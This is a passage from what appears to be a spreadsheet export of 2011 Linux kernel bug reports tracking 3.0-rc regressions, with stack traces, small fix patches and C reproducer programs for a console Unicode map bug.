    <t>NFS crash in un-modified 3.0.0-rc3+, list corruption.</t>
  </si>
  <si>
    <t>2011-06-26 20:35 UTC</t>
  </si>
  <si>
    <t>2011-08-14 19:10 UTC</t>
  </si>
  <si>
    <t>Subject : NFS crash in un-modified 3.0.0-rc3+, list corruption. Submitter : Ben Greear &lt;greearb@candelatech.com&gt; Date : 2011-06-20 22:42 Message-ID : 4DFFCCDC.2070106@candelatech.com References : http://marc.info/?l=linux-kernel&amp;m=130860979610651&amp;w=2 This entry is being used for tracking a regression from 2.6.39. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>System hang when enable rc6</t>
  </si>
  <si>
    <t>3.0-rc4+</t>
  </si>
  <si>
    <t>2011-06-27 08:16 UTC</t>
  </si>
  <si>
    <t>2011-08-14 19:22 UTC</t>
  </si>
  <si>
    <t>Commit a51f7a66fb5e give rc6 a try but I am the unlucky one. Enabling rc6 will cause the system hang(no keyboard response etc.) I have booted 3.0-rc4+ with i915.i915_enable_rc6=0 and it will boot up fine. My box is DELL Vostro3500 with core i5 inside.</t>
  </si>
  <si>
    <t>address space collision error message on boot</t>
  </si>
  <si>
    <t>3.0.0rc5</t>
  </si>
  <si>
    <t>2011-06-29 02:28 UTC</t>
  </si>
  <si>
    <t>2011-08-14 19:09 UTC</t>
  </si>
  <si>
    <t>With kernel 3.0.0 I am getting the following error message on boot: [ 0.818722] pci_root PNP0A08:00: address space collision: host bridge window [mem 0x000c8000-0x000dffff] conflicts with Video ROM [mem 0x000c0000-0x000cdbff] My system is ASRock z68 Pro3 mb with i5-2500K cpu. I have used git bisect to locate the patch which has caused the message to appear: commit 5d94e81f69d4b1d1102d3ab557ce0a817c11fbbb Author: Dan Williams &lt;dan.j.williams@intel.com&gt; Date: Tue Mar 8 10:36:19 2011 -0800 x86: Introduce pci_map_biosrom() The isci driver needs to retrieve its preboot OROM image which contains necessary runtime parameters like platform specific sas addresses and phy configuration. There is no ROM BAR associated with this area, instead we will need to scan legacy expansion ROM space. 1/ Promote the probe_roms_32 implementation to x86-64 2/ Add a facility to find and map an adapter rom by pci device (according to PCI Firmware Specification Revision 3.0) Signed-off-by: Dave Jiang &lt;dave.jiang@intel.com&gt; LKML-Reference: &lt;20110308183226.6246.90354.stgit@localhost6.localdomain6&gt; Signed-off-by: Dan Williams &lt;dan.j.williams@intel.com&gt; Signed-off-by: H. Peter Anvin &lt;hpa@linux.intel.com&gt; This patch is "platform" specfic hence I have assigned this bug accordingly, however, it could be just that the acpi tables are reporting incorrect information? I don't know enough about this stuff, but I hope this is of some use. Attached my dmesg. can provide more details as needed.</t>
  </si>
  <si>
    <t>New NFS: directory XXX contains a readdir loop seems to be triggered by well-behaving server</t>
  </si>
  <si>
    <t>3.0.0-rc4-00096</t>
  </si>
  <si>
    <t>2011-06-30 19:38 UTC</t>
  </si>
  <si>
    <t>2011-08-10 11:41 UTC</t>
  </si>
  <si>
    <t>Created attachment 64052 [details] wireshark decoded trace When I run for a in `seq 1 1000`; do mkdir $a; touch $a-test; done for a in `seq 1 1000`; do rmdir $a; done for a in `seq 1 1000`; do rm $a-test; done in one terminal, and while true; do ls; done in the another, every now and then kernel says: Jun 30 11:38:36 petr-dev3 kernel: [65277.074773] NFS: directory petr/asd contains a readdir loop. Please contact your server vendor. Offending cookie: 41912 Jun 30 11:38:37 petr-dev3 kernel: [65277.520933] NFS: directory petr/asd contains a readdir loop. Please contact your server vendor. Offending cookie: 42904 First I talked to our IT, but after capturing packets I cannot see anything wrong on server's side. In wireshark capture I see that cookie 41912 was returned twice for the same readdir loop (server does not use cookieverf, it returns 0 always): petr-dev3:~# grep '\(cookie: 0\|Cookie: 41912\|EOF: 1\)' trace.txt4 cookie: 0 Cookie: 41912 Cookie: 41912 cookie: 0 Cookie: 41912 Cookie: 41912 But it did so because client issued very same readdir request twice, completely ignoring all data from first request: petr-dev3:~# grep '\(cookie:\|Cookie: 41912\|EOF: 1\)' trace.txt4 | grep -C2 41912 cookie: 40584 cookie: 41744 Cookie: 41912 cookie: 41744 Cookie: 41912 cookie: 42904 cookie: 44068 -- cookie: 40616 cookie: 41776 Cookie: 41912 cookie: 41776 Cookie: 41912 cookie: 42936 cookie: 44100 Textual decoded trace of readdirplus cycle which triggered kernel messages is attached. Non-decoded trace of full session is 80MB :-(</t>
  </si>
  <si>
    <t>suspicious rcu_dereference_check() usage in block/cfq-iosched.c:2776</t>
  </si>
  <si>
    <t>2011-07-01 04:18 UTC</t>
  </si>
  <si>
    <t>2011-07-13 18:43 UTC</t>
  </si>
  <si>
    <t>Acer Aspire 7750G Core i7 in 64bit mode Slackware64 13.37 Since 3.0-rc5, I get the following at boot: device-mapper: multipath round-robin: version 1.0.0 loaded scsi 6:0:0:0: Direct-Access Generic- Multi-Card 1.00 PQ: 0 ANSI: 0 CCS =================================================== [ INFO: suspicious rcu_dereference_check() usage. ] --------------------------------------------------- block/cfq-iosched.c:2776 invoked rcu_dereference_check() without protection! other info that might help us debug this: rcu_scheduler_active = 1, debug_locks = 0 3 locks held by scsi_scan_6/1552: #0: (&amp;shost-&gt;scan_mutex){+.+.+.}, at: [&lt;ffffffff8145efca&gt;] scsi_scan_host_selected+0x5a/0x150 #1: (&amp;eq-&gt;sysfs_lock){+.+...}, at: [&lt;ffffffff812a5032&gt;] elevator_exit+0x22/0x60 #2: (&amp;(&amp;q-&gt;__queue_lock)-&gt;rlock){-.-...}, at: [&lt;ffffffff812b6233&gt;] cfq_exit_queue+0x43/0x190 stack backtrace: Pid: 1552, comm: scsi_scan_6 Not tainted 3.0.0-rc5 #17 Call Trace: [&lt;ffffffff810abb9b&gt;] lockdep_rcu_dereference+0xbb/0xc0 [&lt;ffffffff812b6139&gt;] __cfq_exit_single_io_context+0xe9/0x120 [&lt;ffffffff812b626c&gt;] cfq_exit_queue+0x7c/0x190 [&lt;ffffffff812a5046&gt;] elevator_exit+0x36/0x60 [&lt;ffffffff812a802a&gt;] blk_cleanup_queue+0x4a/0x60 [&lt;ffffffff8145cc09&gt;] scsi_free_queue+0x9/0x10 [&lt;ffffffff81460944&gt;] __scsi_remove_device+0x84/0xd0 [&lt;ffffffff8145dca3&gt;] scsi_probe_and_add_lun+0x353/0xb10 [&lt;ffffffff817da069&gt;] ? error_exit+0x29/0xb0 [&lt;ffffffff817d98ed&gt;] ? _raw_spin_unlock_irqrestore+0x3d/0x80 [&lt;ffffffff8145e722&gt;] __scsi_scan_target+0x112/0x680 [&lt;ffffffff812c690d&gt;] ? trace_hardirqs_off_thunk+0x3a/0x3c [&lt;ffffffff817da069&gt;] ? error_exit+0x29/0xb0 [&lt;ffffffff812bcc60&gt;] ? kobject_del+0x40/0x40 [&lt;ffffffff8145ed16&gt;] scsi_scan_channel+0x86/0xb0 [&lt;ffffffff8145f0b0&gt;] scsi_scan_host_selected+0x140/0x150 [&lt;ffffffff8145f149&gt;] do_scsi_scan_host+0x89/0x90 [&lt;ffffffff8145f170&gt;] do_scan_async+0x20/0x160 [&lt;ffffffff8145f150&gt;] ? do_scsi_scan_host+0x90/0x90 [&lt;ffffffff810975b6&gt;] kthread+0xa6/0xb0 [&lt;ffffffff817db154&gt;] kernel_thread_helper+0x4/0x10 [&lt;ffffffff81066430&gt;] ? finish_task_switch+0x80/0x110 [&lt;ffffffff817d9c04&gt;] ? retint_restore_args+0xe/0xe [&lt;ffffffff81097510&gt;] ? __init_kthread_worker+0x70/0x70 [&lt;ffffffff817db150&gt;] ? gs_change+0xb/0xb</t>
  </si>
  <si>
    <t>3.0.0-rc4-git6 - INFO: possible circular locking dependency detected - (&amp;rdev-&gt;mtx){+.+.+.}, at: [&lt;ffffffffa00e27e0&gt;] cfg80211_netdev_notifier_call+0x275/0x4ff [cfg80211]</t>
  </si>
  <si>
    <t>3.0.0-rc4-git6</t>
  </si>
  <si>
    <t>2011-07-02 21:35 UTC</t>
  </si>
  <si>
    <t>2011-07-10 11:13 UTC</t>
  </si>
  <si>
    <t>Subject : 3.0.0-rc4-git6 - INFO: possible circular locking dependency detected - (&amp;rdev-&gt;mtx){+.+.+.}, at: [&lt;ffffffffa00e27e0&gt;] cfg80211_netdev_notifier_call+0x275/0x4ff [cfg80211] Submitter : Miles Lane &lt;miles.lane@gmail.com&gt; Date : 2011-06-26 21:54 Message-ID : BANLkTikztsFnPkJZ7VxRC-zsitwCCvVmeg@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=130912559804336&amp;w=2 This entry is being used for tracking a regression from 2.6.39. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>3.0rc3-rc5: usb stops working after resume from suspend to ram</t>
  </si>
  <si>
    <t>2011-07-03 13:25 UTC</t>
  </si>
  <si>
    <t>2011-07-08 15:07 UTC</t>
  </si>
  <si>
    <t>Subject : 3.0rc3-rc5: usb stops working after resume from suspend to ram Submitter : Arkadiusz Miskiewicz &lt;a.miskiewicz@gmail.com&gt; Date : 2011-06-29 19:21 Message-ID : 201106292121.34523.a.miskiewicz@gmail.com References : http://marc.info/?l=linux-kernel&amp;m=130937533419483&amp;w=2 This entry is being used for tracking a regression from 2.6.39. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Linux 3.0-rc5 doesnt boot and hangs at rcu_sched_state ()</t>
  </si>
  <si>
    <t>2011-07-03 13:36 UTC</t>
  </si>
  <si>
    <t>Subject : Linux 3.0-rc5 doesnt boot and hangs at rcu_sched_state () Submitter : RKK &lt;kulkarni.ravi4@gmail.com&gt; Date : 2011-06-29 13:38 Message-ID : BANLkTikW6Xk8UMsOHLCnLn7STRzy8RaiJA@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=130935402722869&amp;w=2 This entry is being used for tracking a regression from 2.6.39. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Hot-unplugging a USB hub causes USB hotplugging not to work in version 3.0.0-rc5 and later</t>
  </si>
  <si>
    <t>3.0.0-rc6</t>
  </si>
  <si>
    <t>2011-07-06 03:36 UTC</t>
  </si>
  <si>
    <t>Michael Marley</t>
  </si>
  <si>
    <t>2011-07-06 18:36 UTC</t>
  </si>
  <si>
    <t>Created attachment 64732 [details] dmesg output from the normally-working kernel (with the above commit reverted). In Linux 3.0.0-rc5 a bug was introduced into the USB hub driver that causes any form of USB hotplugging to cease working after a USB hub has been unplugged while the system is running. The dmesg log shows the hub disconnecting normally but does not produce any output for any devices hotplugged in afterward. Additionally, ACPI suspend fails after this stating that khubd locked up during the suspend process. I tracked down the issue to commit 95a2424ff9221624c3944f3732f6cfacbb522ae4 (https://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=95a2424ff9221624c3944f3732f6cfacbb522ae4). Reverting that commit causes normal behavior to return. My system is a Dell Vostro 1500 with the Intel ICH8 USB controller. I don't have any other systems to try reproducing this on at the moment, but if needed, I probably could. Also, if I can provide any more data, please let me know.</t>
  </si>
  <si>
    <t>Kernel panic when syncing while cifs is mounted</t>
  </si>
  <si>
    <t>2011-07-08 15:39 UTC</t>
  </si>
  <si>
    <t>farbing</t>
  </si>
  <si>
    <t>2011-08-14 19:07 UTC</t>
  </si>
  <si>
    <t>The kernel panics every time a sync from the command line is executed. I have bisected it to commit dd8544661947ad6d8d87b3c9d4333bfa1583d1bc (take bdi setup/destruction into cifs_mount/cifs_umount) I'm mounting the cifs fs with the following line from fstab: //fritz.box/FRITZ.NAS/Verbatim-STORENGO-01 /mnt/fritz cifs credentials=/path/to/cred/file,user,gid=disk,nounix,file_mode=0664,dir_mode=0775,noauto,comment=systemd.automount 0 0 comment=systemd.automount means that it will be mounted on first access through an autofs mount point. Attached is a screenshot of the kernel panic. This is probably related to the bug report here: https://lkml.org/lkml/2011/7/4/289 Thanks</t>
  </si>
  <si>
    <t>.tmp_depmod owned by root after modules_install</t>
  </si>
  <si>
    <t>3.0-rc</t>
  </si>
  <si>
    <t>2011-07-09 12:12 UTC</t>
  </si>
  <si>
    <t>2011-08-09 07:54 UTC</t>
  </si>
  <si>
    <t>Subject : .tmp_depmod owned by root after modules_install Submitter : Christian Kujau &lt;lists@nerdbynature.de&gt; Date : 2011-07-04 9:49 Message-ID : alpine.DEB.2.01.1107040242180.9183@trent.utfs.org References : http://marc.info/?l=linux-kernel&amp;m=130977296812731&amp;w=2 This entry is being used for tracking a regression from 2.6.39. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>AR9285 (ath9k) - Asus K52Jc lose wireless module after suspend (Arch/also on Ubuntu)</t>
  </si>
  <si>
    <t>Linux 2.6.39-ARCH #1 SMP PREEMPT Sat Jul 9 14:57:41 CEST 2011 x86_64 GenuineIntel GNU/Linux</t>
  </si>
  <si>
    <t>2011-07-10 17:53 UTC</t>
  </si>
  <si>
    <t>beta992</t>
  </si>
  <si>
    <t>2016-02-13 00:53 UTC</t>
  </si>
  <si>
    <t>Hello, I have a issue with my wireless AR9285 adapter on the new kernel. Everything works fine, until the laptop suspends. After resume, the wireless module is not active anymore. To get it working again I need to do the following: modprobe -r ath9k modprobe ath9k On the older kernel 2.6.38 there was no issue. Hope the problem can be solve, If you need any other info, please contact me.</t>
  </si>
  <si>
    <t>Starting with 3.0.0-rc6, masquerading seems to be broken.</t>
  </si>
  <si>
    <t>2011-07-10 19:45 UTC</t>
  </si>
  <si>
    <t>2011-08-24 11:52 UTC</t>
  </si>
  <si>
    <t>Hi guys, Starting with 3.0.0-rc6, masquerading seems to be broken for SSL websites suchs as https://bugzilla.kernel.org and https://www.google.com ... Problem was noticed when google sync was broken ... Than you very much, David C. Hill</t>
  </si>
  <si>
    <t>3.0.0-r5: ftrace: BUG &amp; OOPS</t>
  </si>
  <si>
    <t>2011-07-11 17:53 UTC</t>
  </si>
  <si>
    <t>2011-08-09 12:12 UTC</t>
  </si>
  <si>
    <t>Subject : 3.0.0-r5: ftrace: BUG &amp; OOPS Submitter : Brian Marete &lt;marete@toshnix.com&gt; Date : 2011-07-07 10:23 Message-ID : CAHVUoiRRGY62BZOMYPYxytG569MD0=8=TEN9pCwYefDBg+J+uQ@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=131003426121018&amp;w=2 This entry is being used for tracking a regression from 2.6.39. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>intel-iommu: Dont cache iova above 32bit - network copy freezes system</t>
  </si>
  <si>
    <t>2.6.39.2</t>
  </si>
  <si>
    <t>2011-07-13 14:32 UTC</t>
  </si>
  <si>
    <t>Marcus Becker</t>
  </si>
  <si>
    <t>2011-08-09 07:57 UTC</t>
  </si>
  <si>
    <t>Created attachment 65422 [details] dmesg Hi, With the upgrade to 2.6.39.2, I cannot copy more than ~1GB of data over the network before my input devices lock up. Example: use scp on tty1 to copy a folder or file larger than 3GB over my gigabit network and after ~1min the keyboard stops responding. use cp on tty1 with an nfs-3 share mounted over the same network and try to copy the same file, same happens I can hit ctrl+c for about 20-30 sec and eventually get an interrupt that stops the copying, then the input devices slowly gain control again. If I do the same on X, there is no chance to get in between and I have to use SysRq to reboot. In our bug report at https://bugs.gentoo.org/show_bug.cgi?id=373109 We did a bisect between 2.6.39.1 and 2.6.39.2 and found the following patch is causing this problem: commit 87cc4d1e3e05af38c7c51323a3d86fe2572ab033 Author: Chris Wright &lt;chrisw@sous-sol.org&gt; Date: Sat May 28 13:15:04 2011 -0500 intel-iommu: Dont cache iova above 32bit I will also attach dmesg, current kernel config, and my bisect log (I put a uname -a into the log after each bisect) plus git bisect log Please let me know if you need more information. Thanks, Marcus</t>
  </si>
  <si>
    <t>[3.0.0-rc6-git7] possible recursive locking at cache_alloc_refill</t>
  </si>
  <si>
    <t>3.0.0-rc6-git7</t>
  </si>
  <si>
    <t>2011-07-14 08:07 UTC</t>
  </si>
  <si>
    <t>2011-08-23 07:43 UTC</t>
  </si>
  <si>
    <t>Subject : [3.0.0-rc6-git7] possible recursive locking at cache_alloc_refill Submitter : Tetsuo Handa &lt;penguin-kernel@i-love.sakura.ne.jp&gt; Date : 2011-07-11 12:37 Message-ID : 201107112137.FAD00545.SHtLOFOJOMFQFV@I-love.SAKURA.ne.jp References : http://marc.info/?l=linux-kernel&amp;m=131038788902151&amp;w=2 This entry is being used for tracking a regression from 2.6.39. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[r280] Black screen on PPC with digital monitor on radeon / Cannot find any crtc or sizes</t>
  </si>
  <si>
    <t>2011-07-20 21:29 UTC</t>
  </si>
  <si>
    <t>Vlado Plaga</t>
  </si>
  <si>
    <t>2011-08-08 08:40 UTC</t>
  </si>
  <si>
    <t>Created attachment 66132 [details] syslog from system without video output Testing Kernel 3.0.0 (rc6 from Debian experimental) I encountered a problem with (DVI) display detection - the screen goes blank when trying to activate KMS. From syslog: [drm:radeon_add_legacy_connector] *ERROR* DVI: Failed to assign ddc bus! Check dmesg for i2c errors. [drm] DDC: no ddc bus - possible BIOS bug - please report to xorg-driver-ati@lists.x.org No connectors reported connected with modes [drm] Cannot find any crtc or sizes - going 1024x768 To me this looks quite similar to #23222. With a VGA monitor the screen does not go blank, but I still don't get the login window in KDM (?). I'm using Ubuntu 11.04 and with a self-compiled 2.6.39-rc7 kernel I have working KMS (even though direct rendering does not work, as reported on https://bugs.freedesktop.org/show_bug.cgi?id=37169 ).</t>
  </si>
  <si>
    <t>iwlagn crashes on attempt to suspend/hibernate</t>
  </si>
  <si>
    <t>2011-07-22 12:48 UTC</t>
  </si>
  <si>
    <t>2011-08-09 08:04 UTC</t>
  </si>
  <si>
    <t>After updating 2.6.39 -&gt; 3.0 I can't suspend/hibernate anymore. iwlagn driver crashes somewhere in suspend routines. stack: iwlagn_wait_tx_queue_empty+0x41/0xac iwlagn_mac_flush __ieee80211_suspend ? index_show ieee80211_suspend wiphy_suspend legacy_suspend __device_suspend dpm_suspend dpm_suspend_start suspend_devices_and_enter (see URL for camera photo with stack) After unloading iwlagn I'm able to suspend again. 2.6.39 works just fine so it's definitly regression</t>
  </si>
  <si>
    <t>savagefb.h CARD SERIES definition typo</t>
  </si>
  <si>
    <t>3.0.0</t>
  </si>
  <si>
    <t>2011-07-23 10:20 UTC</t>
  </si>
  <si>
    <t>jpsinthemix</t>
  </si>
  <si>
    <t>2011-08-09 08:12 UTC</t>
  </si>
  <si>
    <t>I have an old T22 Thinkpad with integrated Savage/IX-MV video. As of linux-3.0, the video is non-functional; the PC either hard hangs immediately or has totally garbled video, and then hard hangs, as soon as I attempt to edit a file or cat a file with more than a screen-full of text. The foregoing details are actually not important any more as in looking at the code changes I discovered a typo in linux-3.0.0/drivers/video/savage/savagefb.h and have applied the following patch to fix the issue: --- linux-3.0.0.old/drivers/video/savage/savagefb.h 2011-07-21 22:17:23.000000000 -0400 +++ linux-3.0.0.new/drivers/video/savage/savagefb.h 2011-07-23 05:13:33.801215293 -0400 @@ -55,7 +55,7 @@ #define S3_SAVAGE3D_SERIES(chip) ((chip&gt;=S3_SAVAGE3D) &amp;&amp; (chip&lt;=S3_SAVAGE_MX)) -#define S3_SAVAGE4_SERIES(chip) ((chip&gt;=S3_SAVAGE4) || (chip&lt;=S3_PROSAVAGEDDR)) +#define S3_SAVAGE4_SERIES(chip) ((chip&gt;=S3_SAVAGE4) &amp;&amp; (chip&lt;=S3_PROSAVAGEDDR)) #define S3_SAVAGE_MOBILE_SERIES(chip) ((chip==S3_SAVAGE_MX) || (chip==S3_SUPERSAVAGE)) P.S. Many, many thanks for lifting the 800x600 resolution limit! I've been using a patch/hack to bump the limit to 1024x768 for an very long time... John</t>
  </si>
  <si>
    <t>WARNING: at drivers/tty/tty_ldisc.c:766 tty_ldisc_reinit+0x7d/0x90()</t>
  </si>
  <si>
    <t>3.0.0-rc7</t>
  </si>
  <si>
    <t>2011-07-24 06:32 UTC</t>
  </si>
  <si>
    <t>2012-05-12 13:44 UTC</t>
  </si>
  <si>
    <t>Subject : WARNING: at drivers/tty/tty_ldisc.c:766 tty_ldisc_reinit+0x7d/0x90() Submitter : Vegard Nossum &lt;vegard.nossum@gmail.com&gt; Date : 2011-07-19 11:33 Message-ID : CAOMGZ=HS2EPkYD=5HfkSPpwPqHB5V3q0vaFmoZ8Hh+pMM9phrQ@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=131107522914558&amp;w=2 This entry is being used for tracking a regression from 2.6.39. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[rt61pci] Kernel crash when disconnecting from network</t>
  </si>
  <si>
    <t>2011-07-24 14:57 UTC</t>
  </si>
  <si>
    <t>Bruno Jacquet</t>
  </si>
  <si>
    <t>2011-08-14 19:03 UTC</t>
  </si>
  <si>
    <t>Hi, When I disconnect from my WPA wifi network I get a kernel crash with a call trace about crypto_destroy_tfm called from ifconfig. (If I read the trace right) I'm using rt61pci. I do not get this with 2.6.39</t>
  </si>
  <si>
    <t>LG VL600 4G USB modem broken in 2.6.39</t>
  </si>
  <si>
    <t>2011-07-25 00:05 UTC</t>
  </si>
  <si>
    <t>Mark Kamichoff</t>
  </si>
  <si>
    <t>2012-02-23 22:14 UTC</t>
  </si>
  <si>
    <t>Hi - It appears that upon inclusion into 2.6.39 mainline, the driver for the LG VL600 has stopped working. The original patch for 2.6.38 can be obtained below: https://github.com/balrog-kun/LG-VL600-utils/blob/master/lg-vl600-linux-2.6.38.patch When patched against 2.6.38, this modem works as expected on Verizon's LTE network in the USA. However, ever since it was included in 2.6.39 mainline, it does not work correctly. The interface comes up correctly, but no traffic passes through the interface, including DHCP request packets. This has been reproduced on both i386 and x86-64. After looking into this, I managed to make it work again by doing the following: --- linux-2.6.39-orig/drivers/net/usb/cdc_ether.c 2011-07-24 19:48:36.000000000 -0400 +++ linux-2.6.39/drivers/net/usb/cdc_ether.c 2011-07-24 19:49:27.000000000 -0400 @@ -567,7 +567,7 @@ { USB_DEVICE_AND_INTERFACE_INFO(0x1004, 0x61aa, USB_CLASS_COMM, USB_CDC_SUBCLASS_ETHERNET, USB_CDC_PROTO_NONE), - .driver_info = (unsigned long)&amp;wwan_info, + .driver_info = 0, }, /* Apparently with wwan_info being set, the lg-vl600 driver was no longer being registered correctly, and the modem is seen as a generic cdc_ether device: [ 19.462567] usb 1-1: Product: LG UDC-AHB Subsystem [ 19.476948] usb 1-1: Manufacturer: LG ELECTRONICSInc [ 19.646303] cdc_acm 1-1:1.2: ttyACM0: USB ACM device [ 19.726490] usbcore: registered new interface driver cdc_acm [ 19.743535] cdc_acm: v0.26:USB Abstract Control Model driver for USB modems and ISDN adapters [ 19.826110] cdc_ether 1-1:1.0: wwan0: register 'cdc_ether' at usb-0000:00:0f.5-1, Mobile Broadband Network Device, 64:99:5d:f7:c0:64 With it set back to 0, the driver is correctly registered: [ 19.667135] usb 1-1: Product: LG UDC-AHB Subsystem [ 19.681527] usb 1-1: Manufacturer: LG ELECTRONICSInc [ 19.908204] cdc_acm 1-1:1.2: ttyACM0: USB ACM device [ 19.926913] usbcore: registered new interface driver cdc_acm [ 19.943957] cdc_acm: v0.26:USB Abstract Control Model driver for USB modems and ISDN adapters [ 20.056480] usbcore: registered new interface driver cdc_ether [ 20.142189] lg-vl600 1-1:1.0: eth3: register 'lg-vl600' at usb-0000:00:0f.5-1, LG VL600 modem, 64:99:5d:f7:c0:64 This regresses the fix to name the device wwanX instead of ethX, so there's probably a better way of doing this. Let me know what other information may be useful. - Mark</t>
  </si>
  <si>
    <t>[regression] Radeon multi-screen</t>
  </si>
  <si>
    <t>2011-07-25 14:04 UTC</t>
  </si>
  <si>
    <t>Robert Piasek</t>
  </si>
  <si>
    <t>2011-08-28 19:19 UTC</t>
  </si>
  <si>
    <t>Created attachment 66532 [details] boot logs Hi, With 3.0 I can no longer use 4 screens on ATI FirePro™ 2460 Multi-View (ATI Technologies Inc Device 68f1). All 4 screens are detected, but the driver can only see two of them (like in standard dual-head card). Also xrandr gives me: "xrandr: cannot find crtc for output" Switching back to 2.6.39 and everything is just fine again. Boot lots from both kernels attached. Please let me know if you require more information.</t>
  </si>
  <si>
    <t>IRQ 0 assigned to VGA</t>
  </si>
  <si>
    <t>2.6.37 and up</t>
  </si>
  <si>
    <t>2011-07-25 17:40 UTC</t>
  </si>
  <si>
    <t>Szymon Kowalczyk</t>
  </si>
  <si>
    <t>2012-07-14 15:14 UTC</t>
  </si>
  <si>
    <t>Feng Tang</t>
  </si>
  <si>
    <t>In openSUSE 11.4 and also in Ubuntu 10.14 my wideo card S3 UniChrome Pro P4M800 Pro PCI:*(0:1:0:0) 1106:3344:1734:109b rev 1, Mem @ 0xf0000000/67108864, 0xd1000000/16777216 has IRQ 0 assigned in openSUSE 11.3 and earlier it has IRQ 16 I can use system but I have to klick or move mouse from time to time because system freeze. adding boot parameters pci=noacpi acpi=off freeze system immediately after boot-splash appear I have no option in bios for ACPI/IRQ settings computer is Fujitsu-Siemens Amilo Pro V2030D Reproducible: Always "Yeah, this looks like a very broken irq assignment code bug: -pci 0000:01:00.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 +pci 0000:01:00.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 0" more info: /proc/interrupts dmesg lspci -v -s 01:00.0 acpidump dmidecode lspci -nn</t>
  </si>
  <si>
    <t>PIO_UNIMAP bug: error updating Unicode-to-font map</t>
  </si>
  <si>
    <t>2011-07-25 17:56 UTC</t>
  </si>
  <si>
    <t>Ivan</t>
  </si>
  <si>
    <t>2012-06-13 15:10 UTC</t>
  </si>
  <si>
    <t>There is an error in function con_set_unimap (file: linux-3.0/drivers/tty/vt/consolemap.c) During the copying of the map variable l=&lt;current unicode value&gt; does not increment properly. &gt; for (i = 0, l = 0; i &lt; 32; i++) &gt; if ((p1 = p-&gt;uni_pgdir[i])) &gt; ... else (if p1 == NULL) its value will be left unchanged instead of += ... Steps to reproduce: 1. fbdev driver should be used 2. Switch to virtual console 1 (Alt+F1) 3. Compile and run test1.c 4. Switch to virtual console 2 (Alt+F2) 5. Run test1.c 6. Compile and run test2.c You will get something like Current Unicode-to-font map 0x123 U+0001 // Should be U+0041 0x134 U+0042 ----- test1.c ----- #define _GNU_SOURCE #include &lt;err.h&gt; #include &lt;errno.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; #include &lt;sys/types.h&gt; #include &lt;sys/stat.h&gt; #include &lt;fcntl.h&gt; #include &lt;linux/kd.h&gt; int main(int argc, char *argv[]) { struct unipair up = {0x0041, 0x0123}; struct unimapdesc ud = {1, &amp;up}; int fd; fd = open("/dev/tty0", O_RDWR); if (fd &lt; 0) err(1, "open"); if (ioctl(fd, PIO_UNIMAPCLR, &amp;ud) &lt; 0) err(1, "ioctl(PIO_UNIMAPCLR)"); if (ioctl(fd, PIO_UNIMAP, &amp;ud) &lt; 0) err(1, "ioctl(PIO_UNIMAP)"); int i, ct; ud.entry_ct = 0; ud.entries = 0; if (ioctl(fd, GIO_UNIMAP, &amp;ud) &lt; 0 &amp;&amp; errno != ENOMEM) err(1, "ioctl(GIO_UNIMAP)"); ct = ud.entry_ct; ud.entries = (struct unipair *) malloc(ct * sizeof(struct unipair)); if (ud.entries == NULL) { return -1; } if (ioctl(fd, GIO_UNIMAP, &amp;ud) &lt; 0) err(1, "ioctl(GIO_UNIMAP)"); printf("Current Unicode-to-font map\n"); for (i = 0; i &lt; ud.entry_ct; i++) printf("0x%02x\tU+%04x\n", ud.entries[i].fontpos, ud.entries[i].unicode); close(fd); return EXIT_SUCCESS; } ---------- ----- test2.c ----- #define _GNU_SOURCE #include &lt;err.h&gt; #include &lt;errno.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; #include &lt;sys/types.h&gt; #include &lt;sys/stat.h&gt; #include &lt;fcntl.h&gt; #include &lt;linux/kd.h&gt; int main(int argc, char *argv[]) { struct unipair up = {0x0042, 0x0134}; struct unimapdesc ud = {1, &amp;up}; int fd; fd = open("/dev/tty0", O_RDWR); if (fd &lt; 0) err(1, "open"); if (ioctl(fd, PIO_UNIMAP, &amp;ud) &lt; 0) err(1, "ioctl(PIO_UNIMAP)"); int i, ct; ud.entry_ct = 0; ud.entries = 0; if (ioctl(fd, GIO_UNIMAP, &amp;ud) &lt; 0 &amp;&amp; errno != ENOMEM) err(1, "ioctl(GIO_UNIMAP)"); ct = ud.entry_ct; ud.entries = (struct unipair *) malloc(ct * sizeof(struct unipair)); if (ud.entries == NULL) { return -1; } if (ioctl(fd, GIO_UNIMAP, &amp;ud) &lt; 0) err(1, "ioctl(GIO_UNIMAP)"); printf("Current Unicode-to-font map\n"); for (i = 0; i &lt; ud.entry_ct; i++) printf("0x%02x\tU+%04x\n", ud.entries[i].fontpos, ud.entries[i].unicode); close(fd); return EXIT_SUCCESS; } ----------</t>
  </si>
  <si>
    <t>iwlagn: bad 802.11n performance and "aggregation not enabled" flood in dmesg</t>
  </si>
  <si>
    <t>2011-07-25 18:46 UTC</t>
  </si>
  <si>
    <t>2012-01-13 19:06 UTC</t>
  </si>
  <si>
